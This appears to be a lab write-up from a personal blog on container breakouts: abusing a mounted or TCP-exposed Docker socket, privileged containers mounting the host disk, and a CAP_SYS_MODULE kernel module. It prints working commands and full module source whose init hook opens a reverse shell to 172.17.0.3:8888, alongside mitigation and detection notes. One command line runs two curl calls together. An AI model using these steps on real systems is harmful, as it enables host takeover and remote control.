Container Security: Common Issues

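A) Docker Unix socket mounted in a container, or Docker TCP socket exposed (container breakout 1): anyone who can reach the Docker API can ask the daemon to start a container with arbitrary host paths mounted, so access to the socket is equivalent to root on the host. Keep docker.sock out of workload containers, and do not expose the daemon over TCP without mutual TLS.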

# Check whether a Docker Unix socket is listening.
netstat -a -p --unix | grep docker
# Lab setup: start a container with the host's /run/docker.sock bind-mounted at
# /var/docker.sock. This bind mount is the misconfiguration this section examines.
docker run -it -v /run/docker.sock:/var/docker.sock --name alpine1 alpine sh
# Locate the socket file. The same search works as a quick audit for containers
# that have the daemon socket mounted.
find / -name docker.sock
curl --unix-socket /var/docker.sock -H "Content-Type: application/json" \                                                                                                                                                                 
> -d '{"Image": "alpine", "Cmd": ["echo", "hello world"]}' \
> -X POST http://localhost/v1.41/containers/create
curl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/startcurl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/wait
# Download and unpack the static Docker CLI (20.10.9), then serve the current
# directory over HTTP on port 80.
wget https://download.docker.com/linux/static/stable/x86_64/docker-20.10.9.tgz
tar -xvf docker-20.10.9.tgz
python3 -m http.server 80
# Fetch the client binary from 172.17.0.1 and make it executable.
# NOTE(review): presumably these two commands run inside the container and the
# three above on the host; the page does not say, confirm.
curl http://172.17.0.1/docker/docker --output docker_cli
chmod +x docker_cli
# Over the mounted socket, the daemon is asked for a new container with the host's
# / bind-mounted at /host_fs/, followed by a chroot into that tree. The daemon
# performs the mount on the host side, which is why socket access defeats isolation.
# Detection: log and alert on container-create requests whose binds include / or
# the Docker socket itself.
./docker_cli -H unix:///var/docker.sock run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash
# Same issue over TCP: dockerd is started listening on 0.0.0.0:2375 with no TLS
# options, so the commands below reach the API without presenting any credential.
# If remote access is required, dockerd supports --tlsverify with client
# certificates; an SSH-tunnelled connection is the other common option.
/usr/sbin/dockerd -H tcp://0.0.0.0:2375
docker -H tcp://0.0.0.0:2375 run --net=host -it ubuntu sh
./docker -H tcp://127.0.0.1:2375 run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash

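B) Privileged container, or all capabilities allowed (container breakout 2): a privileged container is given access to the host's devices, so the container boundary no longer protects the host filesystem. Avoid --privileged and grant only the individual capabilities a workload needs.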

--privileged OR --cap-add=all
# Mount the block device /dev/sda1 at /mnt and chroot into it.
# NOTE(review): /dev/sda1 is presumably the host's root partition in this lab; the
# device name differs between systems.
# Mitigation: reject privileged containers at admission or policy level, and treat
# a mount of a host block device from inside a container as an alert condition.
mount /dev/sda1 /mnt
chroot /mnt bash

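C) Exploiting capabilities: a container that holds CAP_SYS_MODULE can load kernel modules into the kernel it shares with the host, so code in such a module runs with kernel privileges outside the container. Do not add CAP_SYS_MODULE to containers.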

# List running processes.
ps -aux
# Show the capability sets (CapInh/CapPrm/CapEff/CapBnd ...) of PID 1.
cat /proc/1/status | grep Cap
# Decode the capability bitmask into names. In 00000000a80525fb bit 16 is set,
# which is CAP_SYS_MODULE, the capability that permits loading kernel modules.
# The same two commands are a quick audit of what a running container was granted.
capsh --decode=00000000a80525fb
# Install a compiler toolchain and the headers for the running kernel.
# Detection: installing build-essential or linux-headers inside a running container
# is unusual for a production workload and is worth alerting on.
sudo apt-get install -y build-essential linux-headers-$(uname -r)
# Print the IP address of this host/container.
hostname -i
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kmod.h>
/*
 * Module metadata. These strings are embedded in the built .ko and are shown
 * by modinfo, so they are also what an investigator sees when triaging an
 * unexpected module file.
 */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
/*
 * Command string passed to bash by the init hook: an interactive bash whose
 * input and output are redirected to a TCP connection to 172.17.0.3:8888
 * (the lab address used in this write-up).
 */
static char command[] = "bash -i >& /dev/tcp/172.17.0.3/8888 0>&1"; // outbound connection target is hard-coded here

/* Argument vector for the user-mode helper; argv[0] doubles as the executable path. */
char *argv[] = {
"/bin/bash",
"-c", // run the next element as a command string
command, // the command string defined above
NULL // End of the list
};
/* Environment for the helper process: only HOME is set. */
static char *envp[] = {
"HOME=/",
NULL // End of the list
};

/*
 * Init hook, run when the module is loaded (registered via module_init).
 * Starts argv[0] with argv/envp through call_usermodehelper() and returns that
 * call's result as the module's init status.
 *
 * The helper is spawned by the kernel rather than by the process that called
 * insmod. NOTE(review): it is therefore expected to run as root outside the
 * container's namespaces; confirm on the kernel in use.
 *
 * Defender notes: loading requires CAP_SYS_MODULE. Module loads can be audited
 * through the init_module/finit_module syscalls and show up in lsmod and the
 * kernel log. Enforced module signing, or kernel.modules_disabled=1 once boot
 * has finished, prevents an unsigned module like this one from loading.
 */
static int __init connect_back_init(void)
{

return call_usermodehelper(
argv[0], // execution path
argv, // arguments for process
envp, // environment for process
UMH_WAIT_EXEC // wait only until the exec has happened, not for the process to exit
);
}

/*
 * Exit hook, run when the module is unloaded (registered via module_exit).
 * It only writes "Exiting" to the kernel log at KERN_INFO. Nothing here stops
 * the helper process started by the init hook, so unloading the module does
 * not by itself end that process.
 */
static void __exit connect_back_exit(void)
{
printk(KERN_INFO "Exiting\n");
}

/* Register the load and unload hooks with the kernel's module machinery. */
module_init(connect_back_init);
module_exit(connect_back_exit);
# Kbuild fragment: build reverseshell_module.o as a loadable kernel module (obj-m).
obj-m += reverseshell_module.o

# Both targets hand off to the build tree of the running kernel
# (/lib/modules/<uname -r>/build), with M= pointing back at this directory, so the
# headers for that exact kernel must be installed wherever this runs.
# Defender note: a kernel build tree or compiler inside a workload container is an
# anomaly; minimal images without toolchains remove this step's prerequisites.
all:
make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) modules

# Remove the build products through the same kernel build tree.
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) clean
# Fetch a built module from 172.17.0.1:8000 and load it with insmod.
# insmod needs CAP_SYS_MODULE. Docker's default seccomp profile also gates the
# init_module/finit_module syscalls on that capability, so a container run with
# default capabilities is refused at this step.
# Detection: audit init_module/finit_module calls made from container processes.
wget http://172.17.0.1:8000/rev_module.ko
chmod +x rev_module.ko; insmod rev_module.ko

Geek👾. Tries to understand how computers work. Would love to hear your suggestions and feedbacks. https://www.linkedin.com/in/pswalia2u/
